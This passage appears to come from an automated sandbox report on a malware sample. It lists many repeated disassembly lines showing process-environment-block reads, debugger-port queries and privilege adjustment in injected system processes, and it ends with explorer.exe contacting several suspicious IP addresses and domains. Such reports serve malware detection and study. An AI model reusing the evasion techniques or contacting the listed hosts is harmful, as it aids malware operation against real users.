Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131746D mov eax, dword ptr fs:[00000030h] 1_2_0131746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h] 1_2_0138C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h] 1_2_0138C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A44B mov eax, dword ptr fs:[00000030h] 1_2_0132A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130849B mov eax, dword ptr fs:[00000030h] 1_2_0130849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B14FB mov eax, dword ptr fs:[00000030h] 1_2_013B14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h] 1_2_01376CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h] 1_2_01376CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h] 1_2_01376CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8CD6 mov eax, dword ptr fs:[00000030h] 1_2_013C8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h] 1_2_012F4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h] 1_2_012F4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132E730 mov eax, dword ptr fs:[00000030h] 1_2_0132E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h] 1_2_0131B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h] 1_2_0131B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131F716 mov eax, dword ptr fs:[00000030h] 1_2_0131F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h] 1_2_0138FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h] 1_2_0138FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C070D mov eax, dword ptr fs:[00000030h] 1_2_013C070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C070D mov eax, dword ptr fs:[00000030h] 1_2_013C070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h] 1_2_0132A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h] 1_2_0132A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130FF60 mov eax, dword ptr fs:[00000030h] 1_2_0130FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8F6A mov eax, dword ptr fs:[00000030h] 1_2_013C8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130EF40 mov eax, dword ptr fs:[00000030h] 1_2_0130EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377794 mov eax, dword ptr fs:[00000030h] 1_2_01377794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377794 mov eax, dword ptr fs:[00000030h] 1_2_01377794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377794 mov eax, dword ptr fs:[00000030h] 1_2_01377794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01308794 mov eax, dword ptr fs:[00000030h] 1_2_01308794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013337F5 mov eax, dword ptr fs:[00000030h] 1_2_013337F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AFE3F mov eax, dword ptr fs:[00000030h] 1_2_013AFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FE620 mov eax, dword ptr fs:[00000030h] 1_2_012FE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h] 1_2_0132A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h] 1_2_0132A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h] 1_2_012FC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h] 1_2_012FC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h] 1_2_012FC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01328E00 mov eax, dword ptr fs:[00000030h] 1_2_01328E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1608 mov eax, dword ptr fs:[00000030h] 1_2_013B1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h] 1_2_0131AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h] 1_2_0131AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h] 1_2_0131AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h] 1_2_0131AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h] 1_2_0131AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130766D mov eax, dword ptr fs:[00000030h] 1_2_0130766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h] 1_2_013BAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h] 1_2_013BAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013746A7 mov eax, dword ptr fs:[00000030h] 1_2_013746A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h] 1_2_013C0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h] 1_2_013C0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h] 1_2_013C0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138FE87 mov eax, dword ptr fs:[00000030h] 1_2_0138FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013216E0 mov ecx, dword ptr fs:[00000030h] 1_2_013216E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013076E2 mov eax, dword ptr fs:[00000030h] 1_2_013076E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8ED6 mov eax, dword ptr fs:[00000030h] 1_2_013C8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01338EC7 mov eax, dword ptr fs:[00000030h] 1_2_01338EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AFEC0 mov eax, dword ptr fs:[00000030h] 1_2_013AFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013236CC mov eax, dword ptr fs:[00000030h] 1_2_013236CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359F358 mov eax, dword ptr fs:[00000030h] 10_2_0359F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359DB40 mov eax, dword ptr fs:[00000030h] 10_2_0359DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h] 10_2_035C3B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h] 10_2_035C3B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359DB60 mov ecx, dword ptr fs:[00000030h] 10_2_0359DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03668B58 mov eax, dword ptr fs:[00000030h] 10_2_03668B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365131B mov eax, dword ptr fs:[00000030h] 10_2_0365131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036153CA mov eax, dword ptr fs:[00000030h] 10_2_036153CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036153CA mov eax, dword ptr fs:[00000030h] 10_2_036153CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BDBE9 mov eax, dword ptr fs:[00000030h] 10_2_035BDBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03665BA5 mov eax, dword ptr fs:[00000030h] 10_2_03665BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2397 mov eax, dword ptr fs:[00000030h] 10_2_035C2397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CB390 mov eax, dword ptr fs:[00000030h] 10_2_035CB390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h] 10_2_035A1B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h] 10_2_035A1B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364D380 mov ecx, dword ptr fs:[00000030h] 10_2_0364D380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365138A mov eax, dword ptr fs:[00000030h] 10_2_0365138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h] 10_2_035C4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h] 10_2_035C4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h] 10_2_035C4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h] 10_2_0364B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h] 10_2_0364B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03668A62 mov eax, dword ptr fs:[00000030h] 10_2_03668A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h] 10_2_03599240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h] 10_2_03599240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h] 10_2_03599240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h] 10_2_03599240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D927A mov eax, dword ptr fs:[00000030h] 10_2_035D927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365EA55 mov eax, dword ptr fs:[00000030h] 10_2_0365EA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03624257 mov eax, dword ptr fs:[00000030h] 10_2_03624257
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B3A1C mov eax, dword ptr fs:[00000030h] 10_2_035B3A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h] 10_2_03595210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03595210 mov ecx, dword ptr fs:[00000030h] 10_2_03595210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h] 10_2_03595210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h] 10_2_03595210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h] 10_2_0359AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h] 10_2_0359AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A8A0A mov eax, dword ptr fs:[00000030h] 10_2_035A8A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h] 10_2_035D4A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h] 10_2_035D4A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h] 10_2_0365AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h] 10_2_0365AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2ACB mov eax, dword ptr fs:[00000030h] 10_2_035C2ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2AE4 mov eax, dword ptr fs:[00000030h] 10_2_035C2AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h] 10_2_035CD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h] 10_2_035CD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h] 10_2_035AAAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h] 10_2_035AAAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CFAB0 mov eax, dword ptr fs:[00000030h] 10_2_035CFAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h] 10_2_035952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h] 10_2_035952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h] 10_2_035952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h] 10_2_035952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h] 10_2_035952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h] 10_2_035BB944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h] 10_2_035BB944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h] 10_2_0359B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h] 10_2_0359B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359C962 mov eax, dword ptr fs:[00000030h] 10_2_0359C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h] 10_2_03599100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h] 10_2_03599100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h] 10_2_03599100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C513A mov eax, dword ptr fs:[00000030h] 10_2_035C513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C513A mov eax, dword ptr fs:[00000030h] 10_2_035C513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov ecx, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036241E8 mov eax, dword ptr fs:[00000030h] 10_2_036241E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0359B1E1
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_01339910
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 38.55.236.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.darkchocolatebliss.com
Source: C:\Windows\explorer.exe Domain query: www.marketmall.digital
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.132 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 54.38.220.85 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.209.6.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 89.31.143.1 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.canadianlocalbusiness.com
Source: C:\Windows\explorer.exe Domain query: www.y31jaihdb6zm87.buzz
Source: C:\Windows\explorer.exe Network Connect: 162.213.255.142 80 Jump to behavior
